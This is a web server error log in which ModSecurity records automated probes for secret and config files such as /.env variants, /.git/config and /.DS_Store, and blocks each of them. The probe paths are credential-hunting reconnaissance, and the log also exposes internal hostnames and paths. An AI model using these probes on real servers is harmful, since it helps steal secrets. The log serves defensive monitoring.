[Fri Mar 07 22:41:32.829869 2025] [:error] [pid 1618973] [client 193.41.206.50:35144] [client 193.41.206.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z8toDBA2xqqVfalw27Wr7gAAAAY"]
[Fri Mar 07 22:41:32.830525 2025] [:error] [pid 1618973] [client 193.41.206.50:35144] [client 193.41.206.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z8toDBA2xqqVfalw27Wr7gAAAAY"]
[Fri Mar 07 22:41:32.831056 2025] [:error] [pid 1618973] [client 193.41.206.50:35144] [client 193.41.206.50] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z8toDBA2xqqVfalw27Wr7gAAAAY"]
[Fri Mar 07 22:41:33.129335 2025] [authz_core:error] [pid 1617762] [client 193.41.206.50:35156] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Fri Mar 07 22:41:33.696486 2025] [:error] [pid 1623580] [client 193.41.206.50:35158] [client 193.41.206.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z8toDXQCI01QGzZ9cC-9JwAAAAk"]
[Fri Mar 07 22:41:33.697057 2025] [:error] [pid 1623580] [client 193.41.206.50:35158] [client 193.41.206.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z8toDXQCI01QGzZ9cC-9JwAAAAk"]
[Fri Mar 07 22:41:33.697525 2025] [:error] [pid 1623580] [client 193.41.206.50:35158] [client 193.41.206.50] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z8toDXQCI01QGzZ9cC-9JwAAAAk"]
[Sun Mar 09 12:53:18.652479 2025] [:error] [pid 1661024] [client 196.251.88.108:53912] [client 196.251.88.108] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z82BLoj7A5zkImPzPl8THwAAAAU"]
[Sun Mar 09 12:53:18.653097 2025] [:error] [pid 1661024] [client 196.251.88.108:53912] [client 196.251.88.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z82BLoj7A5zkImPzPl8THwAAAAU"]
[Sun Mar 09 12:53:18.653602 2025] [:error] [pid 1661024] [client 196.251.88.108:53912] [client 196.251.88.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z82BLoj7A5zkImPzPl8THwAAAAU"]
[Sun Mar 09 19:17:27.707956 2025] [:error] [pid 1661339] [client 45.148.10.237:48308] [client 45.148.10.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z83bNwictaUf718xO-joPwAAAAo"]
[Sun Mar 09 19:17:27.708536 2025] [:error] [pid 1661339] [client 45.148.10.237:48308] [client 45.148.10.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z83bNwictaUf718xO-joPwAAAAo"]
[Sun Mar 09 19:17:27.708972 2025] [:error] [pid 1661339] [client 45.148.10.237:48308] [client 45.148.10.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z83bNwictaUf718xO-joPwAAAAo"]
[Sun Mar 09 19:17:27.913686 2025] [:error] [pid 1666478] [client 45.148.10.237:48342] [client 45.148.10.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z83bN76vWnrxIZA2nl05XwAAAAE"]
[Sun Mar 09 19:17:27.913910 2025] [:error] [pid 1666478] [client 45.148.10.237:48342] [client 45.148.10.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z83bN76vWnrxIZA2nl05XwAAAAE"]
[Sun Mar 09 19:17:27.914073 2025] [:error] [pid 1666478] [client 45.148.10.237:48342] [client 45.148.10.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z83bN76vWnrxIZA2nl05XwAAAAE"]
[Sun Mar 09 19:17:28.418807 2025] [:error] [pid 1661008] [client 45.148.10.237:48566] [client 45.148.10.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z83bODV71pfFolEauGOlPgAAAAA"]
[Sun Mar 09 19:17:28.419116 2025] [:error] [pid 1661008] [client 45.148.10.237:48566] [client 45.148.10.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z83bODV71pfFolEauGOlPgAAAAA"]
[Sun Mar 09 19:17:28.419334 2025] [:error] [pid 1661008] [client 45.148.10.237:48566] [client 45.148.10.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z83bODV71pfFolEauGOlPgAAAAA"]
[Sun Mar 09 19:17:28.523993 2025] [:error] [pid 1661012] [client 45.148.10.237:48616] [client 45.148.10.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z83bOMc5LHaxeidRofnWfQAAAAQ"]
[Sun Mar 09 19:17:28.524433 2025] [:error] [pid 1661012] [client 45.148.10.237:48616] [client 45.148.10.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z83bOMc5LHaxeidRofnWfQAAAAQ"]
[Sun Mar 09 19:17:28.524767 2025] [:error] [pid 1661012] [client 45.148.10.237:48616] [client 45.148.10.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z83bOMc5LHaxeidRofnWfQAAAAQ"]
[Sun Mar 09 19:17:28.749107 2025] [:error] [pid 1661010] [client 45.148.10.237:48634] [client 45.148.10.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /login/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z83bOKdqfb713GEcCO4g8gAAAAI"]
[Sun Mar 09 19:17:28.749709 2025] [:error] [pid 1661010] [client 45.148.10.237:48634] [client 45.148.10.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z83bOKdqfb713GEcCO4g8gAAAAI"]
[Sun Mar 09 19:17:28.750129 2025] [:error] [pid 1661010] [client 45.148.10.237:48634] [client 45.148.10.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z83bOKdqfb713GEcCO4g8gAAAAI"]
[Sun Mar 09 19:17:28.885995 2025] [:error] [pid 1661008] [client 45.148.10.237:48720] [client 45.148.10.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z83bODV71pfFolEauGOlQAAAAAA"]
[Sun Mar 09 19:17:28.886259 2025] [:error] [pid 1661008] [client 45.148.10.237:48720] [client 45.148.10.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z83bODV71pfFolEauGOlQAAAAAA"]
[Sun Mar 09 19:17:28.886431 2025] [:error] [pid 1661008] [client 45.148.10.237:48720] [client 45.148.10.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z83bODV71pfFolEauGOlQAAAAAA"]
[Sun Mar 09 19:17:28.977653 2025] [:error] [pid 1661012] [client 45.148.10.237:48734] [client 45.148.10.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z83bOMc5LHaxeidRofnWfwAAAAQ"]
[Sun Mar 09 19:17:28.977881 2025] [:error] [pid 1661012] [client 45.148.10.237:48734] [client 45.148.10.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z83bOMc5LHaxeidRofnWfwAAAAQ"]
[Sun Mar 09 19:17:28.978030 2025] [:error] [pid 1661012] [client 45.148.10.237:48734] [client 45.148.10.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z83bOMc5LHaxeidRofnWfwAAAAQ"]
[Sun Mar 09 19:17:29.156859 2025] [authz_core:error] [pid 1661008] [client 45.148.10.237:48776] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Sun Mar 09 19:17:29.280594 2025] [:error] [pid 1661012] [client 45.148.10.237:48816] [client 45.148.10.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z83bOcc5LHaxeidRofnWgAAAAAQ"]
[Sun Mar 09 19:17:29.281181 2025] [:error] [pid 1661012] [client 45.148.10.237:48816] [client 45.148.10.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z83bOcc5LHaxeidRofnWgAAAAAQ"]
[Sun Mar 09 19:17:29.281630 2025] [:error] [pid 1661012] [client 45.148.10.237:48816] [client 45.148.10.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z83bOcc5LHaxeidRofnWgAAAAAQ"]
[Sun Mar 09 21:09:07.170675 2025] [:error] [pid 1661012] [client 35.166.225.110:52264] [client 35.166.225.110] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z831Y8c5LHaxeidRofnWhwAAAAQ"]
[Sun Mar 09 21:09:07.171395 2025] [:error] [pid 1661012] [client 35.166.225.110:52264] [client 35.166.225.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z831Y8c5LHaxeidRofnWhwAAAAQ"]
[Sun Mar 09 21:09:07.171847 2025] [:error] [pid 1661012] [client 35.166.225.110:52264] [client 35.166.225.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z831Y8c5LHaxeidRofnWhwAAAAQ"]
[Sun Mar 16 19:07:52.522668 2025] [authz_core:error] [pid 1825655] [client 209.38.208.202:38610] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Mar 16 19:07:53.040826 2025] [:error] [pid 1825625] [client 209.38.208.202:38654] [client 209.38.208.202] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "Z9cTeU3vw5tiE8Gb5q9iVgAAAAA"]
[Sun Mar 16 19:07:53.041461 2025] [:error] [pid 1825625] [client 209.38.208.202:38654] [client 209.38.208.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "Z9cTeU3vw5tiE8Gb5q9iVgAAAAA"]
[Sun Mar 16 19:07:53.041883 2025] [:error] [pid 1825625] [client 209.38.208.202:38654] [client 209.38.208.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "Z9cTeU3vw5tiE8Gb5q9iVgAAAAA"]
